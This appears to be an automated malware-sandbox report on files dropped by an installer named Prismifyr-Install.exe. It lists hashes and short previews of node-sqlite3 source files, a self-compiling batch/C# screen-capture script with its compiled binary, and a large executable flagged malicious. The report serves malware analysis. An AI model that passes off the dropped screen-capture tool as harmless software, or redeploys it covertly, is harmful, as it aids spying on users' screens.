                                                                                                                                                                                                                                    Preview:#ifndef NODE_SQLITE3_SRC_ASYNC_H.#define NODE_SQLITE3_SRC_ASYNC_H..#include <napi.h>.#include <uv.h>..#include "threading.h"..// Generic uv_async handler..template <class Item, class Parent> class Async {. typedef void (*Callback)(Parent* parent, Item* item);..protected:. uv_async_t watcher;. NODE_SQLITE3_MUTEX_t. std::vector<Item*> data;. Callback callback;.public:. Parent* parent;..public:. Async(Parent* parent_, Callback cb_). : callback(cb_), parent(parent_) {. watcher.data = this;. NODE_SQLITE3_MUTEX_INIT. uv_loop_t *loop;. napi_get_uv_event_loop(parent_->Env(), &loop);. uv_async_init(loop, &watcher, reinterpret_cast<uv_async_cb>(listener));. }.. static void listener(uv_async_t* handle) {. auto* async = static_cast<Async*>(handle->data);. std::vector<Item*> rows;. NODE_SQLITE3_MUTEX_LOCK(&async->mutex). rows.swap(async->data);. NODE_SQLITE3_MUTEX_UNLOCK(&async->mutex). fo
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Prismifyr-Install.exe
                                                                                                                                                                                                                                    File Type:C source, ASCII text
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):13555
                                                                                                                                                                                                                                    Entropy (8bit):5.0893763582704965
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:192:uPMQUUq5MnkVw1qKQJEiyaMR00/eho92YDZLhFmW3VvGiZ+aVHiZHTQTE6KZaQiX:uPMnqvaOS1Q
                                                                                                                                                                                                                                    MD5:3E21D304AFE1783BDB88122C5563E36C
                                                                                                                                                                                                                                    SHA1:10F57A35B7D217226019DBE2278524BF3E447778
                                                                                                                                                                                                                                    SHA-256:960E50580D2F2E668EE79B0C2EF99EAF006BC9178F438C4BB4E278F80F3D8960
                                                                                                                                                                                                                                    SHA-512:A96AB73F424ABAF806CBD4C0537DC23772709753050FFAB58996435DF33E5FF1BCFEA24193B0ABBDEC1BA2E22E91D8A74CE82CB034CB6035ADE760B7D7730C33
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:#include <cstring>.#include <napi.h>.#include "macros.h".#include "database.h".#include "backup.h"..using namespace node_sqlite3;..Napi::Object Backup::Init(Napi::Env env, Napi::Object exports) {. Napi::HandleScope scope(env);.. // declare napi_default_method here as it is only available in Node v14.12.0+. auto napi_default_method = static_cast<napi_property_attributes>(napi_writable | napi_configurable);.. auto t = DefineClass(env, "Backup", {. InstanceMethod("step", &Backup::Step, napi_default_method),. InstanceMethod("finish", &Backup::Finish, napi_default_method),. InstanceAccessor("idle", &Backup::IdleGetter, nullptr),. InstanceAccessor("completed", &Backup::CompletedGetter, nullptr),. InstanceAccessor("failed", &Backup::FailedGetter, nullptr),. InstanceAccessor("remaining", &Backup::RemainingGetter, nullptr),. InstanceAccessor("pageCount", &Backup::PageCountGetter, nullptr),. InstanceAccessor("retryErrors", &Back
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Prismifyr-Install.exe
                                                                                                                                                                                                                                    File Type:C++ source, ASCII text
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):6882
                                                                                                                                                                                                                                    Entropy (8bit):4.879154935574395
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:192:jXmQS7rRLcxPsPVHXmIXYIyx15kPhw0Io:j2QS7rRLOPs5e0
                                                                                                                                                                                                                                    MD5:29DD2FCA11A4E0776C49140ECAC95CE9
                                                                                                                                                                                                                                    SHA1:837CFBC391C7FAAD304E745FC48AE9693AFAF433
                                                                                                                                                                                                                                    SHA-256:556BA9AF78010F41BC6B5B806743DC728BC181934BF8A7C6E5D606F9B8C7A2E9
                                                                                                                                                                                                                                    SHA-512:5785667B9C49D4F4320022C98E0567A412B48A790C99569261C12B8738BDE0B4949D3998E2B375540EDE2FF1D861CAD859780ADE796B71D4D1D692E1ED449021
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:#ifndef NODE_SQLITE3_SRC_BACKUP_H.#define NODE_SQLITE3_SRC_BACKUP_H..#include "database.h"..#include <string>.#include <queue>.#include <set>..#include <sqlite3.h>.#include <napi.h>..using namespace Napi;..namespace node_sqlite3 {../**. *. * A class for managing an sqlite3_backup object. For consistency. * with other node-sqlite3 classes, it maintains an internal queue. * of calls.. *. * Intended usage from node:. *. * var db = new sqlite3.Database('live.db');. * var backup = db.backup('backup.db');. * .... * // in event loop, move backup forward when we have time.. * if (backup.idle) { backup.step(NPAGES); }. * if (backup.completed) { ... success ... }. * if (backup.failed) { ... sadness ... }. * // do other work in event loop - fine to modify live.db. * .... *. * Here is how sqlite's backup api is exposed:. *. * - `sqlite3_backup_init`: This is implemented as. * `db.backup(filename, [callback])` or. * `db.backup(filename, destDbName, sourceDbName, file
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Prismifyr-Install.exe
                                                                                                                                                                                                                                    File Type:C source, ASCII text
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):22230
                                                                                                                                                                                                                                    Entropy (8bit):5.0522303712030086
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:192:JPjStDPG2moQpNrkJTdapteqh/1UpTvo2CqsaSjypFXu6WfqAG3n4lZ+53cY/5pu:JPj2Gxgav1qs1bqY
                                                                                                                                                                                                                                    MD5:D6F67F29966B29034FA0058D59A51794
                                                                                                                                                                                                                                    SHA1:E1F9F8C20B654568E65036D2928EA5DD6E3BBA6B
                                                                                                                                                                                                                                    SHA-256:40EA909433A35A95A8463C49231DDCA040717681FC96EE3BA6F10840429B4AD6
                                                                                                                                                                                                                                    SHA-512:7BEF1762CD869375B589DAC5E780406BAF7B477F14713540940CA177247943642F61C4B2084A08C808EA4F007EDE4BBC1BCF2F19425CB826EFB8B101BE445ED9
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:#include <cstring>.#include <napi.h>..#include "macros.h".#include "database.h".#include "statement.h"..using namespace node_sqlite3;..#if NAPI_VERSION < 6.Napi::FunctionReference Database::constructor;.#endif..Napi::Object Database::Init(Napi::Env env, Napi::Object exports) {. Napi::HandleScope scope(env);. // declare napi_default_method here as it is only available in Node v14.12.0+. auto napi_default_method = static_cast<napi_property_attributes>(napi_writable | napi_configurable); .. auto t = DefineClass(env, "Database", {. InstanceMethod("close", &Database::Close, napi_default_method),. InstanceMethod("exec", &Database::Exec, napi_default_method),. InstanceMethod("wait", &Database::Wait, napi_default_method),. InstanceMethod("loadExtension", &Database::LoadExtension, napi_default_method),. InstanceMethod("serialize", &Database::Serialize, napi_default_method),. InstanceMethod("parallelize", &Database::Parallelize, napi_default_
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Prismifyr-Install.exe
                                                                                                                                                                                                                                    File Type:C++ source, ASCII text
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):5152
                                                                                                                                                                                                                                    Entropy (8bit):4.827269492024068
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:96:HWEP0L0TnYvyVH0GmPnsM8plenrnxiNn5hVB4KTRDpLzysrPrWr7xaqan4qi7lgj:vPivyVHfmPjrcN5h/4KVVr43lUZtX
                                                                                                                                                                                                                                    MD5:DE31AB62B7068AEA6CFFB22B54A435BB
                                                                                                                                                                                                                                    SHA1:7FD98864C970CAA9C60CFC4CE1E77D736B5B5231
                                                                                                                                                                                                                                    SHA-256:8521F458B206ED8F9BF79E2BD869DA0A35054B4BE44D6EA8C371DB207ECCB283
                                                                                                                                                                                                                                    SHA-512:598491103564B024012DA39AC31F54CF39F10DA789CD5B17AF44E93042D9526B9FFD4867112C5F9755CB4ADA398BF5429F01DDA6C1BBC5137BEA545C3C88453B
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:.#ifndef NODE_SQLITE3_SRC_DATABASE_H.#define NODE_SQLITE3_SRC_DATABASE_H...#include <assert.h>.#include <string>.#include <queue>..#include <sqlite3.h>.#include <napi.h>..#include "async.h"..using namespace Napi;..namespace node_sqlite3 {..class Database;...class Database : public Napi::ObjectWrap<Database> {.public:.#if NAPI_VERSION < 6. static Napi::FunctionReference constructor;.#endif. static Napi::Object Init(Napi::Env env, Napi::Object exports);.. static inline bool HasInstance(Napi::Value val) {. auto env = val.Env();. Napi::HandleScope scope(env);. if (!val.IsObject()) return false;. auto obj = val.As<Napi::Object>();.#if NAPI_VERSION < 6. return obj.InstanceOf(constructor.Value());.#else. auto constructor =. env.GetInstanceData<Napi::FunctionReference>();. return obj.InstanceOf(constructor->Value());.#endif. }.. struct Baton {. napi_async_work request = NULL;. Database* db;. Napi::F
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Prismifyr-Install.exe
                                                                                                                                                                                                                                    File Type:C source, ASCII text
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):861
                                                                                                                                                                                                                                    Entropy (8bit):5.4548154843713075
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24:qh2OetAyTMtTlzVh7bbl9lhlRlnRlhmcXQJMyWmnmhm7:getzTMtxVh7bbl9lhlRlnRlgcXQJMyWg
                                                                                                                                                                                                                                    MD5:55A9165C6720727B6EC6CB815B026DEB
                                                                                                                                                                                                                                    SHA1:E737E117BDEFA5838834F342D2C51E8009011008
                                                                                                                                                                                                                                    SHA-256:9D4264BB1DCBEF8D927BB3A1809A01B0B89D726C217CEE99EA9CCFDC7D456B6F
                                                                                                                                                                                                                                    SHA-512:79ED80377BFB576F695F271ED5200BB975F2546110267D264F0AB917F56C26ABF6D3385878285FE3E378B254AF99B59BDB8BBCAB7427788C90A0460EB2EE5B77
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:// http://web.archive.org/web/20140401031018/http://rjpower9000.wordpress.com:80/2012/04/09/fun-with-shared-libraries-version-glibc_2-14-not-found/..#if defined(__linux__)..#define _GNU_SOURCE.#include <features.h>.#undef _GNU_SOURCE..#if defined(__USE_GNU)..#if defined(__x86_64__).__asm__(".symver memcpy,memcpy@GLIBC_2.2.5");.__asm__(".symver exp,exp@GLIBC_2.2.5");.__asm__(".symver log,log@GLIBC_2.2.5");.__asm__(".symver log2,log2@GLIBC_2.2.5");.__asm__(".symver pow,pow@GLIBC_2.2.5");.__asm__(".symver fcntl64,fcntl@GLIBC_2.2.5");.#endif..#if defined(__aarch64__) || defined(_M_ARM64).__asm__(".symver memcpy,memcpy@GLIBC_2.17");.__asm__(".symver exp,exp@GLIBC_2.17");.__asm__(".symver log,log@GLIBC_2.17");.__asm__(".symver log2,log2@GLIBC_2.17");.__asm__(".symver pow,pow@GLIBC_2.17");.__asm__(".symver fcntl64,fcntl@GLIBC_2.17");.#endif..#endif.#endif.
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Prismifyr-Install.exe
                                                                                                                                                                                                                                    File Type:C source, ASCII text
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):11168
                                                                                                                                                                                                                                    Entropy (8bit):3.8120968442523697
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:192:SOxrBErYr4hnxlEPTZFkGdyrKL7h7K0d06I7SFcMWFtOj5Lk8wJfbZh720J0x7YY:95ZHdFvh+84DE5o8wJfbZhKUMFAUn
                                                                                                                                                                                                                                    MD5:B60768ED9DD86A1116E3BCC95FF9387D
                                                                                                                                                                                                                                    SHA1:C057A7EEBBA8CE61E27267930A8526AB54920AA3
                                                                                                                                                                                                                                    SHA-256:C25BE1861BD8E8457300B218F5FA0BBA734F9D1F92B47D3B6AB8EE7C1862CCBE
                                                                                                                                                                                                                                    SHA-512:84E0670128F1D8712E703B6E4B684B904A8081886C9739C63B71962E5D465AC569B16CB0DB74CB41DC015A64DCC1E3A9A20B0CF7F54D4320713CC0F49E0F7363
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:#ifndef NODE_SQLITE3_SRC_MACROS_H.#define NODE_SQLITE3_SRC_MACROS_H..const char* sqlite_code_string(int code);.const char* sqlite_authorizer_string(int type);.#include <vector>..// TODO: better way to work around StringConcat?.#include <napi.h>.inline Napi::String StringConcat(Napi::Value str1, Napi::Value str2) {. return Napi::String::New(str1.Env(), str1.As<Napi::String>().Utf8Value() +. str2.As<Napi::String>().Utf8Value() );.}..// A Napi substitute IsInt32().inline bool OtherIsInt(Napi::Number source) {. double orig_val = source.DoubleValue();. double int_val = static_cast<double>(source.Int32Value());. if (orig_val == int_val) {. return true;. } else {. return false;. }.}..#define IS_FUNCTION(cb) \. !cb.IsUndefined() && cb.IsFunction()..#define REQUIRE_ARGUMENTS(n) \. if (info.Length() < (n)) { \. Napi::TypeError::New(env, "
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Prismifyr-Install.exe
                                                                                                                                                                                                                                    File Type:C source, ASCII text
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):6119
                                                                                                                                                                                                                                    Entropy (8bit):4.884350648884472
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:96:ONYHxRe61zh7H7qmZ+OmLY3jFlOo3zDTjDNhFD/nfHw8lnT3znz/PVTTzP9pbRj7:QY7e61zh7H7qXOL3jFlOo3zDTjDNhFDd
                                                                                                                                                                                                                                    MD5:7D033E9B15E4F2230D8EF59CDE708C69
                                                                                                                                                                                                                                    SHA1:9B05C5CF3F4FC9B2C20BA46420002BB48EDCEB21
                                                                                                                                                                                                                                    SHA-256:E80FAE190ACE1A5153A397AE9FE55D6D28651471FB7BEBF9BBB5528095D70F44
                                                                                                                                                                                                                                    SHA-512:0E709A8C58B73CF6D90F99CE2E0D9F2DBD8DEFE8DC8BC8919F82AB8CE66E7B4435DACB25B919E3A75030777E6A91BEB2132653424B129F12D1169E6A28AB163C
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:#include <stdint.h>.#include <sstream>.#include <cstring>.#include <string>.#include <sqlite3.h>..#include "macros.h".#include "database.h".#include "statement.h".#include "backup.h"..using namespace node_sqlite3;..namespace {..Napi::Object RegisterModule(Napi::Env env, Napi::Object exports) {. Napi::HandleScope scope(env);.. Database::Init(env, exports);. Statement::Init(env, exports);. Backup::Init(env, exports);.. exports.DefineProperties({. DEFINE_CONSTANT_INTEGER(exports, SQLITE_OPEN_READONLY, OPEN_READONLY). DEFINE_CONSTANT_INTEGER(exports, SQLITE_OPEN_READWRITE, OPEN_READWRITE). DEFINE_CONSTANT_INTEGER(exports, SQLITE_OPEN_CREATE, OPEN_CREATE). DEFINE_CONSTANT_INTEGER(exports, SQLITE_OPEN_FULLMUTEX, OPEN_FULLMUTEX). DEFINE_CONSTANT_INTEGER(exports, SQLITE_OPEN_URI, OPEN_URI). DEFINE_CONSTANT_INTEGER(exports, SQLITE_OPEN_SHAREDCACHE, OPEN_SHAREDCACHE). DEFINE_CONSTANT_INTEGER(exports, SQLITE_OPEN_PRIVATECACHE, OPEN_P
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Prismifyr-Install.exe
                                                                                                                                                                                                                                    File Type:C++ source, ASCII text
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):29401
                                                                                                                                                                                                                                    Entropy (8bit):4.878647788340572
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:384:SPNAIMZaIcbU7Z8OIP5SF0IEz/Rc+rniYcCWOJ5ssSmM5OX6rb/4Q6f6qb5aM5vE:YvIgpcgQ6fG
                                                                                                                                                                                                                                    MD5:F4E74D3038BECB8B3093EED0192B7A27
                                                                                                                                                                                                                                    SHA1:66A845CBA7C2C478879238CC79F21DF40DD4575E
                                                                                                                                                                                                                                    SHA-256:2FE8C826256CB1B96E26C74AEAB465A329A307E7E1107BA296D059A07CC0F948
                                                                                                                                                                                                                                    SHA-512:0B3DBEC5D4A098FC551F8516CE87EB4DA292063A2F0C61D7279BC207E33D0D83A2DF9DB04EDCF58B6A0CF0914BA5B51C0E4CA38A17553DDE464B2C37BF7E38DE
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:#include <cstring>.#include <napi.h>.#include <uv.h>..#include "macros.h".#include "database.h".#include "statement.h"..using namespace node_sqlite3;..Napi::Object Statement::Init(Napi::Env env, Napi::Object exports) {. Napi::HandleScope scope(env);.. // declare napi_default_method here as it is only available in Node v14.12.0+. auto napi_default_method = static_cast<napi_property_attributes>(napi_writable | napi_configurable);.. auto t = DefineClass(env, "Statement", {. InstanceMethod("bind", &Statement::Bind, napi_default_method),. InstanceMethod("get", &Statement::Get, napi_default_method),. InstanceMethod("run", &Statement::Run, napi_default_method),. InstanceMethod("all", &Statement::All, napi_default_method),. InstanceMethod("each", &Statement::Each, napi_default_method),. InstanceMethod("reset", &Statement::Reset, napi_default_method),. InstanceMethod("finalize", &Statement::Finalize_, napi_default_method),. });.. exports.Set(
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Prismifyr-Install.exe
                                                                                                                                                                                                                                    File Type:C++ source, ASCII text
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):6781
                                                                                                                                                                                                                                    Entropy (8bit):4.730525251915133
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:192:T2kHmSF3oPvmPVD6LjmbaXCYG4hqY21nyi6BF1pcDoF/+InO:1Gw4PvmlQjRNL21+BSDt
                                                                                                                                                                                                                                    MD5:0B81C9BE1DC0FF314182399CDC301AEA
                                                                                                                                                                                                                                    SHA1:7433B86711D132A4DF826BAE80E58801A3EB74C9
                                                                                                                                                                                                                                    SHA-256:605633BA0FB1922C16AA5FBFFFED52A097F29BF31CEE7190D810C24C02DE515B
                                                                                                                                                                                                                                    SHA-512:9CF986538D048A48B9F020FC51F994F25168540DB35BDB0314744FDEC80A45BA99064BC35FE76B35918753C2886D4466FDD7E36B25838C6039F712E5AC7D81B3
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:#ifndef NODE_SQLITE3_SRC_STATEMENT_H.#define NODE_SQLITE3_SRC_STATEMENT_H..#include <cstdlib>.#include <cstring>.#include <string>.#include <queue>.#include <vector>.#include <sqlite3.h>.#include <napi.h>.#include <uv.h>..#include "database.h".#include "threading.h"..using namespace Napi;..namespace node_sqlite3 {..namespace Values {. struct Field {. inline Field(unsigned short _index, unsigned short _type = SQLITE_NULL) :. type(_type), index(_index) {}. inline Field(const char* _name, unsigned short _type = SQLITE_NULL) :. type(_type), index(0), name(_name) {}.. unsigned short type;. unsigned short index;. std::string name;.. virtual ~Field() = default;. };.. struct Integer : Field {. template <class T> inline Integer(T _name, int64_t val) :. Field(_name, SQLITE_INTEGER), value(val) {}. int64_t value;. virtual ~Integer() override = default;. };.. struct Float : Field {.
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Prismifyr-Install.exe
                                                                                                                                                                                                                                    File Type:C source, ASCII text
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):388
                                                                                                                                                                                                                                    Entropy (8bit):5.099563136480987
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:6:MhkY0gUk3fg7IWy8jbg8QQ8ejbg2YmtWmbggVDDWmbgUUF9Xfg9gkv:tYB3qVyA8ej1Ym4mhDKmwm99v
                                                                                                                                                                                                                                    MD5:F2A075D3101C2BF109D94F8C65B4ECB5
                                                                                                                                                                                                                                    SHA1:D48294AEC0B7AEB03CF5D56A9912E704B9E90BF6
                                                                                                                                                                                                                                    SHA-256:E0AB4F798BCCB877548B0AB0F3D98C051B36CDE240FDF424C70ACE7DAF0FFD36
                                                                                                                                                                                                                                    SHA-512:D95B5FDA6CB93874FE577439F7BD16B10EAE37B70C45AE2BD914790C1E3BA70DFB6BDA7BE79D196F2C40837D98F1005C3ED209CAB9BA346ADA9CE2ED62A87F13
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:#ifndef NODE_SQLITE3_SRC_THREADING_H.#define NODE_SQLITE3_SRC_THREADING_H..#define NODE_SQLITE3_MUTEX_t uv_mutex_t mutex;.#define NODE_SQLITE3_MUTEX_INIT uv_mutex_init(&mutex);.#define NODE_SQLITE3_MUTEX_LOCK(m) uv_mutex_lock(m);.#define NODE_SQLITE3_MUTEX_UNLOCK(m) uv_mutex_unlock(m);.#define NODE_SQLITE3_MUTEX_DESTROY uv_mutex_destroy(&mutex);..#endif // NODE_SQLITE3_SRC_THREADING_H.
                                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                                                                                    File Type:MSVC .res
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1076
                                                                                                                                                                                                                                    Entropy (8bit):4.218444908533655
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:12:DXtAwi3ntdXRAH/YAQX9aUGiqMZAiN5THryw+cktahYnqqb+ckiPN5Dlq5Q4iR4/:2JxDEuZhN9utaEYiPNnquVm4+A8A6
                                                                                                                                                                                                                                    MD5:A6F2D21624678F54A2ABED46E9F3AB17
                                                                                                                                                                                                                                    SHA1:A2A6F07684C79719007D434CBD1CD2164565734A
                                                                                                                                                                                                                                    SHA-256:AB96911D094B6070CBFB48E07407371DDB41B86E36628B6A10CDB11478192344
                                                                                                                                                                                                                                    SHA-512:0B286DF41C3887EECFF5C38CBD6818078313B555EF001151B41AC11B80466B2F4F39DA518AB9C51EEFF35295CB39D52824DE13E026C35270917D7274F764C676
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:.... ...........................t...<...............0...........t.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...P.....I.n.t.e.r.n.a.l.N.a.m.e...s.c.r.e.e.n.C.a.p.t.u.r.e._.1...3...2...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...X.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...s.c.r.e.e.n.C.a.p.t.u.r.e._.1...3...2...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...^...............................<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" >. <asmv3:application>. <asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">. <dpiAware>True/PM</dpiAw
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Prismifyr-Install.exe
                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):350
                                                                                                                                                                                                                                    Entropy (8bit):4.888222365859566
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:6:qRu9Td8oWRu9Tw3x4mUA+DrASbxjBAyAN0xxCG:O4iR44+DkGCyAW7
                                                                                                                                                                                                                                    MD5:8951565428AA6644F1505EDB592AB38F
                                                                                                                                                                                                                                    SHA1:9C4BEE78E7338F4F8B2C8B6C0E187F43CFE88BF2
                                                                                                                                                                                                                                    SHA-256:8814DB9E125D0C2B7489F8C7C3E95ADF41F992D4397ED718BDA8573CB8FB0E83
                                                                                                                                                                                                                                    SHA-512:7577BAD37B67BF13A0D7F9B8B7D6C077ECDFB81A5BEE94E06DC99E84CB20DB2D568F74D1BB2CEF906470B4F6859E00214BEACCA7D82E2B99126D27820BF3B8F5
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" >. <asmv3:application>. <asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">. <dpiAware>True/PM</dpiAware>. </asmv3:windowsSettings>. </asmv3:application>.</assembly>
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Prismifyr-Install.exe
                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):14246
                                                                                                                                                                                                                                    Entropy (8bit):4.755441316440423
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:384:4cr8sEcBeIXxqXhQsBxf5oBLBfXQM8ybCpGW1KTM+:4KEcRQBTxWlPZxWpG+Qx
                                                                                                                                                                                                                                    MD5:DA0F40D84D72AE3E9324AD9A040A2E58
                                                                                                                                                                                                                                    SHA1:4CA7F6F90FB67DCE8470B67010AA19AA0FD6253F
                                                                                                                                                                                                                                    SHA-256:818350A4FB4146072A25F0467C5C99571C854D58BEC30330E7DB343BCECA008B
                                                                                                                                                                                                                                    SHA-512:30B7D4921F39C2601D94A3E3BB0E3BE79B4B7B505E52523D2562F2E2F32154D555A593DF87A71CDDB61B98403265F42E0D6705950B37A155DC1D64113C719FD9
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:// 2>nul||@goto :batch./*.:batch.@echo off.setlocal enableDelayedExpansion..:: find csc.exe.set "csc=".for /r "%SystemRoot%\Microsoft.NET\Framework\" %%# in ("*csc.exe") do set "csc=%%#"..if not exist "%csc%" (. echo no .net framework installed. exit /b 10.)..if not exist "%~n0.exe" (. call %csc% /nologo /r:"Microsoft.VisualBasic.dll" /win32manifest:"app.manifest" /out:"%~n0.exe" "%~dpsfnx0" || (. exit /b !errorlevel!. ).).%~n0.exe %*.endlocal & exit /b %errorlevel%..*/..// reference.// https://gallery.technet.microsoft.com/scriptcenter/eeff544a-f690-4f6b-a586-11eea6fc5eb8..using System;.using System.Runtime.InteropServices;.using System.Drawing;.using System.Drawing.Imaging;.using System.Collections.Generic;.using Microsoft.VisualBasic;..../// Provides functions to capture the entire screen, or a particular window, and save it to a file...public class ScreenCapture.{.. static String deviceName = "";. static Image capturedImage = null;.. /// Creates an Image obje
                                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):12800
                                                                                                                                                                                                                                    Entropy (8bit):4.691268046940217
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:192:K0ZP9yjWewKlBNOOOP3fs3JBy775ia7SBgvuIbZa8uXZlLpwHdGYpRT/:ZiW6OOOPUy75i/++XZ1pwHdGY7/
                                                                                                                                                                                                                                    MD5:17FE7B96469646C36413F4B80862DE02
                                                                                                                                                                                                                                    SHA1:11FF68A153EA374419546BC6F72AD64BBDF15EFD
                                                                                                                                                                                                                                    SHA-256:7B34A30A1AF17716FB2BAFED819E2838BD901A4F5F430E11C9C280F84D5F3898
                                                                                                                                                                                                                                    SHA-512:C3D71A3A9BD2D7D3BC09310D7FC7F6B682078AAFF19A911EFCE50511633C3F5976E3EAEBF27CB928A09657A9C428A858AFE529E09F9E270E247F239FF6AE74CB
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....!.f.................(..........>G... ...`....@.. ....................................@..................................F..W....`..x............................................................................ ............... ..H............text...D'... ...(.................. ..`.rsrc...x....`.......*..............@..@.reloc...............0..............@..B................ G......H........*...............................................................0............(....(.....+..*....0..L........~....r...po......-(.(.....~.........-..~.....+.r...p(.......(....(.....+..*.0..0.........(................(....&...(.......(....&..+..*.0.............{......{....Y...{......{....Y..(........(.......(..............{......{.... ...(....&...(....&.(....&.(.......(....&....+...*....0............(........o.....*...0............(........o.....*...0...........(......
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Prismifyr-Install.exe
                                                                                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):63862037
                                                                                                                                                                                                                                    Entropy (8bit):6.951556436892716
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:786432:fMguj8Q4VfvjqFTrYqOFh262PuCH2PFVyd8/Wyn:fiAQIHjkH42L2u+N
                                                                                                                                                                                                                                    MD5:96D6158A2EA98333A66B0505DFB4A95A
                                                                                                                                                                                                                                    SHA1:A598BB3DC9498AA62750B620BB768DB4A98D8C78
                                                                                                                                                                                                                                    SHA-256:EA2CAC9B5DFD6FFCF473EBE646ABF512A33B27ACEFCC470799ADB02698F256E7
                                                                                                                                                                                                                                    SHA-512:82C29352D9A82AF47811E27F9C7FF362E2FC536D8DAC598B89BB4438E7C5197FE3604B0C3802EA6771F1BD9DB06330B705E916A2D9C75980B01C051F8149ED02
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Yara Hits:
